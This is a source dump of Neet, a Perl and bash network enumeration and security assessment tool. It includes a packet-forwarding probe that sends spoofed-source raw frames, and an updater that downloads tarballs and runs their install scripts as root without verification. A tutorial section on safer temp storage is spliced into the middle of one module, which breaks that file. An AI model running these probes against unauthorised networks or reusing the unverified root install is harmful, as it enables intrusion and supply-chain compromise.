}
sub Check {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'check'};
}
sub Vuln {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'vuln'};
}
sub Exarch {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'exarch'};
}
sub Extype {
  my $self=shift();
  my $id=shift();
  my $a= $$self{$id}{'extype'};
  if ($a){
    return $a;
  }
  return 0;

}
sub Exmancmd {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'exmancmd'};
}
sub Exautocmd {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'exautocmd'};
}

sub Exautosafe {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'exautosafe'};
}
sub Credentialtype {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'credentialtype'};
}
sub NoTest {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'notest'};
}

sub Exmanusafe {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'exmanusafe'};
}

sub GetVal {
  my $self=shift();
  my $id=shift();
  my $key=shift();
  return $$self{$id}{$key};
}

1;

--------------------------------------------------------------------------------
/content/main/Neet/threads.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

package Neet::threads;
use Storable;
use POSIX ":sys_wait_h";

$SIG{'CHLD'}='Neet::threads::reaper';

my %threads;

sub create {
  Neet::threads->_check();
  my $obj=shift(@_);
  my $callback=shift(@_);
  my @params=@_;
  my $pid=fork();

  if ($pid){
    $Neet::threads::threads{'currentid'}++;
    $Neet::threads::threads{'pids'}{$Neet::threads::threads{'currentid'}}=$pid;
    $Neet::threads::threads{'tids'}{$pid}=$Neet::threads::threads{'currentid'};

    my %thread; $thread{'id'}=$Neet::threads::threads{'currentid'};
    $thread{'pid'}=$pid; $thread{'function'}=$callback; @{$thread{'parameters'}}=@params;
    $thread{'type'}='thread'; $thread{'storage'}="$Neet::threads::threads{'storage'}/$pid";
    my $threadObject=\%thread;
    bless $threadObject, $obj;
    push @{$Neet::threads::threads{'threads'}}, $threadObject;
    return $threadObject;

  } else {

    $Neet::threads::threads{'currentid'}++;
    $Neet::threads::threads{'pids'}{$Neet::threads::threads{'currentid'}}=$pid;
    my $storage="$Neet::threads::threads{'storage'}/$$";

    # Allow the thread to call "self" and access its own object
    my %thread; $thread{'id'}=$Neet::threads::threads{'currentid'};
    $thread{'pid'}=$$; $thread{'function'}=$callback; @{$thread{'parameters'}}=@params;
    $thread{'type'}='thread'; my $threadObject=\%thread; $thread{'storage'}=$storage;
    bless $threadObject, $obj;
    push @{$Neet::threads::threads{'threads'}}, $threadObject;

    my @results=&{"main::$callback"};
    if (@results){
      mkdir $storage;
      close A if (open (A,">$storage/out"));
      chmod oct('700'), "$storage/out";
      store \@results, "$storage/out";
    }
    exit 0;
  }
}

sub reaper {
  my $child=1;
  do {
    $child= waitpid(-1, WNOHANG);
  } while $child>0;
}

sub join {
  my $self=shift();
  return undef if (!defined($self));
  my @return;
  if (exists($$self{'type'})){
    if (!$self->is_running){
      my $tid=$self->tid;
      my $pid=$self->pid;
      $Neet::threads::threads{'pids'}{$tid}=undef;
      ${$Neet::threads::threads{'threads'}}[$tid]=undef;
      # Read back return values;
      my $storage="$Neet::threads::threads{'storage'}/$pid";
      if (-f "$storage/out"){
        my $ref=retrieve "$storage/out";
        unlink "$storage/out";
        rmdir "$storage";
        @return = @{$ref};
      }
    }
  }
  return @return;
}

sub pid {
  my $self=shift();
  if (exists($$self{'pid'})){
    return $$self{'pid'};
  }
  return $$;
}

sub tid {
  my $self=shift();
  if (exists($$self{'id'})){
    return $$self{'id'};
  }
  return 0 if ($$ eq $Neet::threads::threads{'pids'}{0});
  return $Neet::threads::threads{'currentid'};
}

sub self {
  my $tid=$Neet::threads::threads{'currentid'};
  return undef if ($$ eq $Neet::threads::threads{'pids'}{0});
  my $self=@{$Neet::threads::threads{'threads'}}[$tid];
  return $self;
}

sub callback {
  my $self=shift();
  return undef if (!defined($self));
  # create() stores the callback name under the 'function' key
  if (exists($$self{'function'})){
    return $$self{'function'};
  }
  return undef;
}

sub parameters {
  my $self=shift();
  return undef if (!defined($self));
  if (exists($$self{'id'})){
    return @{$$self{'parameters'}};
  }
  return undef;
}

sub is_running {
  my $self=shift();
  return 0 if (!defined($self));
  if (exists($$self{'pid'})){
    my $dir="/proc/$$self{'pid'}";
    if (-d $dir){
      return 1;
    }
  }
  return 0;
}

sub kill {
  Neet::threads->_check();
  my $self=shift();
  if (exists($$self{'id'})){
    my $signal=shift();
    return kill ($signal, $$self{'pid'});
  }
  return undef;
}

sub object {
  my $tid=shift();
  # Prevent threads calling other threads as this information may not be available
  return undef if ($$ != $Neet::threads::threads{'pids'}{0});
  return ${$Neet::threads::threads{'threads'}}[$tid];
}

sub is_joinable {
  my $self=shift();
  return 1 if (!$self->is_running);
  return 0;
}

sub running {
  Neet::threads->_check();
  my @running;
  for my $i (1..$Neet::threads::threads{'currentid'}){
    if (defined(${$Neet::threads::threads{'threads'}}[$i]) && ${$Neet::threads::threads{'threads'}}[$i]->is_running){
      push @running, ${$Neet::threads::threads{'threads'}}[$i];
    }
  }
  return @running;
}

sub joinable {
  my @joinable;
  for my $i (1..$Neet::threads::threads{'currentid'}){
    if (defined(${$Neet::threads::threads{'threads'}}[$i]) && !${$Neet::threads::threads{'threads'}}[$i]->is_running){
      push @joinable, ${$Neet::threads::threads{'threads'}}[$i];
    }
  }
  return @joinable;
}

sub all {
  my @all;
  for my $i (1..$Neet::threads::threads{'currentid'}){
    if (defined(${$Neet::threads::threads{'threads'}}[$i])){
      push @all, ${$Neet::threads::threads{'threads'}}[$i];
    }
  }
  return @all;
}

sub equal {
  my $thr1=shift();
  my $thr2=shift();
  if (exists($$thr1{'pid'}) && exists($$thr2{'pid'})){
    if ($$thr1{'pid'} == $$thr2{'pid'}){
      return 1;
    }
  }
  return 0;
}

sub list {
  Neet::threads->_check();
  my $cmd=shift();
  if (!defined($cmd)){
    return all();
  } elsif ($cmd eq "running"){
    return running();
  } elsif ($cmd eq "joinable"){
    return joinable();
  }
  return undef;
}

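The `create` and `join` subs in this file pass results from child to parent through Storable files under `/tmp/Neet::threads-<user>/`, a predictable path that `_check` reuses if it already exists, so `retrieve` can end up reading a file another local user put there. As an added example (not Neet's own code; `make_private_store`, `is_private`, `store_results` and `load_results` are hypothetical names, and the scan results are constructed), here is the same hand-off with an unpredictable 0700 directory and ownership checks before anything is deserialised:

```perl
#!/usr/bin/perl
# Added example: hypothetical helpers, not part of Neet::threads.
use strict;
use warnings;
use Fcntl qw(:mode);
use File::Temp qw(tempdir);
use Storable qw(nstore retrieve);

# Create the result directory with an unpredictable name. tempdir() makes it
# with mode 0700 and never reuses an existing path, so a directory that
# another local user created in advance is not adopted.
sub make_private_store {
  return tempdir('neet-threads-XXXXXXXX', TMPDIR => 1, CLEANUP => 0);
}

# True only for a real directory or regular file (lstat, so symlinks fail)
# that the current user owns and that group/other have no access to.
sub is_private {
  my ($path, $want_dir) = @_;
  my @st = lstat($path);
  return 0 if (!@st);
  my $mode = $st[2];
  return 0 if ($want_dir ? !S_ISDIR($mode) : !S_ISREG($mode));
  return 0 if ($st[4] != $>);
  return 0 if (S_IMODE($mode) & 0077);
  return 1;
}

# Child side: write under a temporary name, then rename into place so the
# parent never reads a half-written file.
sub store_results {
  my ($dir, $pid, $results) = @_;
  die "refusing unsafe store $dir\n" if (!is_private($dir, 1));
  my $old = umask(0077);
  nstore($results, "$dir/$pid.tmp") or die "store failed: $!\n";
  umask($old);
  rename("$dir/$pid.tmp", "$dir/$pid.out") or die "rename failed: $!\n";
  return 1;
}

# Parent side: check the directory and the file before calling retrieve().
sub load_results {
  my ($dir, $pid) = @_;
  my $file = "$dir/$pid.out";
  return () if (!is_private($dir, 1) || !is_private($file, 0));
  local $Storable::Eval = 0;   # never eval serialised code references
  my $ref = retrieve($file);
  unlink $file;
  return (ref($ref) eq 'ARRAY') ? @{$ref} : ();
}

# Demonstration with constructed data.
sub demo {
  my $dir = make_private_store();
  my $pid = fork();
  die "fork failed: $!\n" if (!defined($pid));
  if ($pid == 0) {
    store_results($dir, $$, [ 'tcp/22 open', 'tcp/80 open' ]);
    exit 0;
  }
  waitpid($pid, 0);
  my @results = load_results($dir, $pid);

  # A directory that group/other can enter must be rejected
  my $loose = "$dir/loose";
  mkdir $loose;
  chmod 0755, $loose;
  my $accepted = is_private($loose, 1);
  rmdir $loose;
  rmdir $dir;
  return (\@results, $accepted);
}

my ($results, $loose_accepted) = demo();
print "child returned: @{$results}\n";
print "0755 directory accepted: ", ($loose_accepted ? "yes" : "no"), "\n";
```

The ownership and mode checks matter most when the directory name has to stay predictable; with `tempdir` they act as a second line of defence.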

sub _check {
  my $obj=shift();
  if (!exists($Neet::threads::threads{'currentid'})){
    $Neet::threads::threads{'pids'}{0}=$$;
    $Neet::threads::threads{'currentid'}=0;

    my %thread; $thread{'id'}=0;
    $thread{'pid'}=$$;
    my $threadObject=\%thread;
    bless $threadObject, $obj;
    push @{$Neet::threads::threads{'threads'}}, $threadObject;

    my $user=$ENV{'USER'};
    if (!defined($user)){
      $user=`/usr/bin/id -un`;
      # Strip the trailing newline so it does not end up in the path
      chomp $user;
    }
    $Neet::threads::threads{'storage'}="/tmp/Neet::threads-${user}/";
    if (! -d "$Neet::threads::threads{'storage'}"){
      mkdir "$Neet::threads::threads{'storage'}";
      chmod oct('700'), "$Neet::threads::threads{'storage'}";

    }
    $Neet::threads::threads{'storage'}="/tmp/Neet::threads-${user}/$$";
    if (! -d "$Neet::threads::threads{'storage'}"){
      mkdir "$Neet::threads::threads{'storage'}";
      chmod oct('700'), "$Neet::threads::threads{'storage'}";
    }
  }
}

sub exit {
  my $obj=shift();
  my $code=shift();
  $code=0 if (!$code);
  exit $code;
}

1;


--------------------------------------------------------------------------------
/content/main/bin/aliases.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

#use strict;

my $file;
if (defined($ARGV[0]) && -f ("$ARGV[0]")){
  $file="$ARGV[0]";
}

exit 1 if (!defined($file));

my $FH;
if (open($FH,"$file")){
  my @live=<$FH>;
  close $FH;
  my $common=0;
  for (my $o=1; $o<4; $o++){
    if (_common(\@live,$o)){
      $common=$o;
    } else {
      last;
    }
  }
  #print "Found that $common octets were common\n";
  # Create the aliases
  # No point creating them if there's no commonality.
  exit 0 if ($common == 0);
  for my $element (@live){
    next if (length($element)<7);
    next if ($element !~/^\d{1,3}\./);
    my @octets=split ("\\.", $element);
    for (my $a=0; $a<$common; $a++){
      shift (@octets);
    }
    my $alias=join ".", @octets;
    chomp $alias;
    $alias .= "~$element";
    print $alias;
  }
}

sub _common {
  my $array=shift();
  my $oct=shift();
  my $sample=undef;
  my $common=1;
  for my $element (@{$array}){
    next if (length($element)<7);
    exit 1 if ($element !~/^\d{1,3}\./);
    my @octets=split "\\.", $element;
    $sample=$octets[$oct-1] if (!defined($sample));
    if ($octets[$oct-1] != $sample){
      $common=0;
      last;
    }
  }
  return $common;
}


--------------------------------------------------------------------------------
/content/main/bin/allTcpPorts:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

use strict;
use File::Find;
my (@_ports,%lookup);
my $high=0;

find(\&handleFile, ".");

for my $port (@_ports){
  if (!exists($lookup{$port})){
    $lookup{$port} = 1;
    if ($port > $high){
      $high=$port;
    }
  }
}

for (my $port=0;$port<=$high;$port++){
  if (exists($lookup{$port})){
    print $port;
    if ($port != $high){
      print ",";
    } else {
      print "\n";
    }
  }
}

sub handleFile {
  # $File::Find::dir is the current directory name,
  # $_ is the current filename within that directory
  # $File::Find::name is the complete pathname to the file.
  return 0 if ( "$_" ne "tcpports.txt");
  push @_ports, listPorts($_);
}

sub listPorts {
  my $file=shift();
  my @ports;
  if (open(FH,$file)){
    until (eof FH){
      my $line=readline (*FH);
      next if ($line !~ /^\d/);
      $line =~ s/(^\d+)[\s\S]+\s/$1/;
      push @ports, $line;
    }
    close FH;
  }
  return @ports;
}

--------------------------------------------------------------------------------
/content/main/bin/fwdetect:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

use strict;
use NetAddr::IP;
use Net::PcapUtils;
use Net::RawIP;
use Net::ARP;
use NetPacket::Ethernet;
use NetPacket::IP;

unshift @INC, "/opt/neet/core";
require JR::NetUtils::NetUtils;

# The purpose of this script is to test whether or not an IP interface is configured to forward IP packets. This is useful in identifying potential routes out of a network.
# We do this by sending an IP packet to the interface under test, destined for our IP address, but the target MAC address. The SRC IP and MAC addresses should be unimportant
# as we aren't using ARP packets and no cache poisoning should take place.

# If the device is NOT forwarding packets, it should just ignore them. If it IS forwarding, then it should forward it back to us. We can identify our packets by the payload.
# Exits with value of 1 if the host is NOT forwarding, or with 0 if it IS forwarding.

# By Jonathan Roach: jonny.hightower at gmail.com.

my $host=$ARGV[0];
my $argQuiet=$ARGV[1];
my $notForwarding=1;
my $quiet=0;

if ($argQuiet && ("$argQuiet" eq "-q")){
  $quiet=1;
}

# The first argument is the IPv4 address of the interface under test; -q suppresses output
die ("Usage: $0 [-q]\n") if (!$host);

if ($host !~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){
  die ("Invalid IP address: $host\n");
}

my @octets=split "\\.", $host;
for my $o (@octets){
  if ($o > 255){
    die ("Invalid IP address: $host\n");
  }
}

my %data;
my $timeout=3; # Seconds - for waiting for ARP reply, and for waiting for the IP packet reply
my $payload="JR's Interface Routing Test!!";

my @ifconfig=`/sbin/ip addr show`;
for my $name (interfaceInfo ("list",@ifconfig)){
  next if ("$name" eq "lo");
  my ($ip,$mask,$bcast,$mac,$object)=interfaceInfo($name,@ifconfig);
  $data{'int'}{$name}{'mac'}=$mac;
  $data{'int'}{$name}{'ip'}=$ip;
  $data{'int'}{$name}{'mask'}=$mask;
  $data{'int'}{$name}{'bcast'}=$bcast;
}

for my $interface (keys(%{$data{'int'}})){
  my $intobj=NetAddr::IP->new($data{'int'}{$interface}{'ip'},$data{'int'}{$interface}{'mask'});
  my $trgobj=NetAddr::IP->new($host);
  if ($intobj->contains($trgobj)){
    $data{$host}{'int'}=$interface;
    last;
  }
}

if (!$data{$host}{'int'}){
  print "Host $host is not on any of the locally connected network segments\n" if (!$quiet);
  exit 4;
}

# Now we need to calculate a Fake IP address from which to send the packets
my $ourIP=$data{'int'}{$data{$host}{'int'}}{'ip'};
my $ourMask=$data{'int'}{$data{$host}{'int'}}{'mask'};
my $ourObj=NetAddr::IP->new($ourIP,$ourMask);
my $network=$ourObj->network->addr;
my $broadcast=$ourObj->broadcast->addr;

my $fakeIP=$ourObj; $fakeIP = $fakeIP + 1;
my $fake=$fakeIP->addr();
if (!($fake ne $network && $fake ne $broadcast)){
  $fakeIP=$ourObj; $fakeIP = $fakeIP - 1;
  $fake=$fakeIP->addr();
}

# Set an alarm to terminate the pcap loops
$SIG{'ALRM'}=sub {
  die ("TIMEOUT");
};

# Set up listener to catch ARP replies
my $pid=open(CHILD, "-|");
if (!$pid){
  $| = 1; # Flush each reply to the parent immediately
  my $mac=$data{'int'}{$data{$host}{'int'}}{'mac'}; $mac =~ s/://g;
  Net::PcapUtils::loop(\&process_arp_pkt, 'FILTER' => 'arp', 'DEV' => $data{$host}{'int'}, 'USERDATA' =>"$mac $host");
  exit;
}

# Set up another listener to catch IP replies
my $pid2=open(CHILD2, "-|");
if (!$pid2){
  $| = 1; # Flush each reply to the parent immediately
  my $mac=$data{'int'}{$data{$host}{'int'}}{'mac'}; $mac =~ s/://g;
  Net::PcapUtils::loop(\&process_ip_pkt, 'FILTER' => 'ip', 'DEV' => $data{$host}{'int'}, 'USERDATA' =>"$mac $host");
  exit;
}

# Wait for children to initialise
sleep 1;

print "* Acquiring MAC address\n" if (!$quiet);
sendArpRequest($data{$host}{'int'},$data{'int'}{$data{$host}{'int'}}{'ip'},$data{'int'}{$data{$host}{'int'}}{'mac'},$host,"ff:ff:ff:ff:ff:ff");
sendArpRequest($data{$host}{'int'},$data{'int'}{$data{$host}{'int'}}{'ip'},$data{'int'}{$data{$host}{'int'}}{'mac'},$host,"ff:ff:ff:ff:ff:ff");

# Read the replies from the ARP listener
eval {
  alarm $timeout;
  while (my $reply=<CHILD>){
    chomp $reply;
    if ($reply =~ /^$host /){
      $reply =~ s/\S+ (\w\w:\w\w:\w\w:\w\w:\w\w:\w\w)/$1/;
      $data{$host}{'mac'}=$reply;
    }
    last if ($data{$host}{'mac'});
  }
  alarm 0;
};

if ("$@" =~ /^TIMEOUT/){
  print "Failed to acquire MAC address for $host\n";
  system("kill $pid");
  system("kill $pid2");
  exit 2;
}

# Now we have the MAC address, terminate the ARP listener.
system("kill $pid");
$pid=0;

print "* Got MAC address $data{$host}{'mac'} for $host\n" if (!$quiet);

# Now prepare the packet
my $n = Net::RawIP->new ({
  ip => {
    'saddr' => $fake,
    'daddr' => $data{'int'}{$data{$host}{'int'}}{'ip'}
  },
  generic => {
    'data' => "$payload $host"
  }
});
$n->ethnew($data{$host}{'int'});
$n->ethset(source => '00:11:22:33:44:55', dest =>$data{$host}{'mac'});
print "* Sending IP packet\n" if (!$quiet);
$n->ethsend;

# Read the replies from the IP listener
eval {
  alarm $timeout;
  while (my $reply=<CHILD2>){
    chomp $reply;
    if ($reply eq "GOTREPLY"){
      print "$host is forwarding packets\n" if (!$quiet);
      $notForwarding=0;
      last;
    }
  }
  alarm 0;
};

if ("$@" =~ /^TIMEOUT/){
  print "$host is NOT forwarding packets\n" if (!$quiet);
  $notForwarding=1;
}

$SIG{'ALRM'}='';

# Terminate the IP listener.
system("kill $pid2");

exit $notForwarding;

sub process_ip_pkt {
  # This is processed by the listener, once for each IP packet that is received
  my ($data, $hdr, $pkt) = @_;
  my ($ourMac,$target)=split " ", $data;
  my $ethObj = NetPacket::Ethernet->decode($pkt);
  my $dstMac=$ethObj->{dest_mac};
  if ("$dstMac" eq "$ourMac"){
    # Decode the IP packet carried in the Ethernet payload, not the raw frame
    my $ipObj=NetPacket::IP->decode($ethObj->{data});
    my $data=$ipObj->{data};
    # STDOUT goes to the CHILD2 handle in the parent process because we used open() with a pipe to fork with IPC
    if ($data =~ /$payload $target$/){
      print "GOTREPLY\n";
    }
  }
}

sub process_arp_pkt {
  # This is processed by the listener, once for each ARP packet that is received
  my ($data, $hdr, $pkt) = @_;
  my ($ourMac,$target)=split " ", $data;
  my $ethObj = NetPacket::Ethernet->decode($pkt);
  my $dstMac=$ethObj->{dest_mac};
  if ("$dstMac" eq "$ourMac"){
    my $srcMac=$ethObj->{src_mac};
    my $srcIP;
    for my $a (0,1,2,3){
      $srcIP .= ord(substr($pkt,(28+$a),1)) . ".";
    }
    chop $srcIP;
    $srcMac=substr($srcMac,0,2) . ":" . substr($srcMac,2,2) . ":" . substr($srcMac,4,2) . ":" . substr($srcMac,6,2) . ":" . substr($srcMac,8,2) . ":" .
      substr($srcMac,10,2);
    # STDOUT goes to the CHILD handle in the parent process because we used open() with a pipe to fork with IPC
    print "$srcIP $srcMac\n";
  }
}

sub sendArpRequest {
  my $dev=shift();
  my $srcIP=shift();
  my $srcMac=shift();
  my $dstIP=shift();
  my $dstMac=shift();
  Net::ARP::send_packet($dev,$srcIP,$dstIP,$srcMac,$dstMac,'request');
}

--------------------------------------------------------------------------------
/content/main/bin/ip2name:
--------------------------------------------------------------------------------
#!/usr/bin/perl

my $TLD=$ENV{'NeetTLD'};
my $use=$ENV{'useNames'};

my %names;
if ($use){
  if (open(N,"${TLD}/hostnames.txt")){
    until (eof N){
      my $line=readline(*N);
      chomp $line;
      if ($line =~ /\S/){
        my ($ip,$name)=split " ", $line;
        $names{$ip}=$name;
      }
    }
    close N;
  }
}

while (my $line=<>){
  if ($use){

    my $ip=$line; $ip =~ s/\D{0,}(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\D[\S\s]+$/$1/;
    if ($ip =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){
      my $name=$names{$ip};
      if ($name){
        # \Q...\E stops the dots in the address acting as regex wildcards
        if ($use == 2){
          $line =~ s/\Q$ip\E/$ip ($name)/g;
        } else {
          $line =~ s/\Q$ip\E/$name/g;
        }
      }
    } else {
      $ip=$line; $ip =~ s/^[\S\s]+ (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\S\s]+$/$1/;
      if ($ip =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){
        my $name=$names{$ip};
        if ($name){
          if ($use == 2){
            $line =~ s/\Q$ip\E/$ip ($name)/g;
          } else {
            $line =~ s/\Q$ip\E/$name/g;
          }
        }
      }
    }
  }
  print $line;
}

--------------------------------------------------------------------------------
/content/main/bin/memo:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# Ensure we can find our Perl modules
BEGIN {
  unshift @INC, "/opt/neet/core";
}

use Neet::Logging;
use strict;
my $logFile=shift(@ARGV);
my $msg=join " ", @ARGV;
if ($ENV{'IP'}){
  $msg = $ENV{'IP'} . ": $msg";
}
my $log=Neet::Logging->new();
$log->LogFile("$logFile");
$log->OpenLog("quiet");
$log->Memo("$msg\n");
$log->CloseLog("quiet");

--------------------------------------------------------------------------------
/content/main/bin/neet-update:
--------------------------------------------------------------------------------
#!/bin/bash

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

if [ `id -u` -ne 0 ]; then
  echo "You must be root to update Neet."
  exit 1
fi

export INVOKEDBYNEETUPDATE=1
export PREFIX=/opt
export NEET="${PREFIX}/neet"
export CONFDIR="${NEET}/etc"
export CONFIG="${CONFDIR}/neet.conf"
export INST="$PWD"

if [ ! -f "${NEET}/core/installsupport" ]; then
  echo "Couldn't locate the install support file. Exiting."
  exit 1
else
  . "${NEET}/core/installsupport"
fi

BASEURI="https://github.com/JonnyHightower/REPO/archive/VERSION.tar.gz"
REPOS="neet neet-deps neet-bundled neet-shell neet-upload neet-resources neet-modules"

# The --local argument prevents neet-update accessing the Internet to check for updates.
# In this case, neet-update only checks for repos that have already been packaged into
# the staging area.
LOCALONLY=0
for arg in $1 $2 $3 $4; do
  if [ "$arg" == "--local" ]; then
    echo "Checking local repos only"
    LOCALONLY=1
    break
  fi
done

# The basic gist is to check each repo to see if it contains a newer version than
# the locally-installed version.
echo " + Checking for updated neet components..."
for repo in $REPOS; do
  localOnly=0
  # Stop if the staging directory is missing, so the rm -rf calls below never run elsewhere
  cd "${NEET}/core/update" || exit 1

  #echo " + Checking repo $repo"
  installed=`getVersion $repo`

  # For local testing
  if [ $LOCALONLY -eq 1 ] || [ -f "stage-$repo" ]; then
    localOnly=1
  fi
  if [ -f "stage-$repo" ]; then
    remote=`cat "stage-$repo"`
  fi
  if [ $localOnly -eq 0 ]; then
    remote=`${NEET}/core/githubVersion $repo $installed`
    if [ -z "$remote" ]; then
      if [ "$installed" != "0.0.0" ]; then
        echo " - Package $repo is already at the latest version ($installed)."
      else
        echo " - Package $repo is not available."
      fi
      continue
    fi
  fi

  REPO=`echo $BASEURI | sed -e "s/REPO/$repo/" -e "s/VERSION/$remote/"`

  echo " + Downloading and installing $repo version $remote"
  echo " > $REPO"

  # Again - to facilitate local testing
  if [ $localOnly -eq 0 ]; then
    rm -f "${repo}.tar.gz" # Just in case an old version already exists
    wget "$REPO" -q -O "${repo}.tar.gz"
    if [ $? -gt 0 ]; then
      echo " - There was an error downloading this component. Not updating."
      rm -f "${repo}.tar.gz"
      continue
    fi
  fi

  if [ -f "${repo}.tar.gz" ]; then
    # Extract the tarball
    archive="${repo}-${remote}"
    rm -rf "$archive" # Just in case

    tar xzf "${repo}.tar.gz"
    if [ $? -gt 0 ]; then
      echo " ! Error extracting $repo"
      echo " Not updating this component."
      rm -f "${repo}.tar.gz"
      continue
    fi
    if [ -x "${archive}/install.sh" ]; then
      #echo " + Installing component $repo version $remote..."
      # Note: install.sh from the downloaded archive runs as root, and this script
      # does not check the tarball against a checksum or signature beforehand.
      cd "$archive"
      ./install.sh

      # Clean up afterwards
      cd "${NEET}/core/update"
      rm -rf "$archive"
      rm -f "${repo}.tar.gz"
      rm -f "stage-$repo"
    else
      echo " ! Got component $repo version $remote but can't install it!"
    fi

  else
    echo " - Could not find this component. Not updating."
  fi
done

# Warn about metasploit
if [ ! -x /opt/metasploit/app/msfcli ]; then
  echo
  echo "!!! Could not find Metasploit installation. This will badly affect the"
  echo " exploit functions in the Neet shell (and may kill your pets)."
  echo
fi

--------------------------------------------------------------------------------
/content/main/bin/netconfig:
--------------------------------------------------------------------------------
#!/bin/bash

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

function usage {
  # The argument is the name of an interface recorded in ifaddrshow.txt
  echo "Usage: netconfig "
  if [ -f ifaddrshow.txt ]; then
    echo
    echo "Interfaces:"
    grep BROADCAST ifaddrshow.txt | grep -v "state DOWN" | awk '{print $2}' | sed -e 's/://'
  fi
  echo
  exit 1
}

if [ -z "$1" ]; then
  usage
fi

if [ ! -f ifaddrshow.txt ] || ! grep " $1: " ifaddrshow.txt >/dev/null 2>&1; then
  usage
fi

HW=`grep " $1: " ifaddrshow.txt -A1 | grep "link/ether" | awk '{print $2}'`
IP=`grep " $1: " ifaddrshow.txt -A2 | grep " inet " | awk '{print $2}'`

echo "Setting $1 HW $HW $IP"
/sbin/ifconfig $1 hw ether $HW
/sbin/ifconfig $1 hw ether $HW
/sbin/ifconfig $1 $IP
/sbin/ifconfig $1 $IP

--------------------------------------------------------------------------------
/content/main/bin/updateLocations:
--------------------------------------------------------------------------------
#!/bin/bash

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
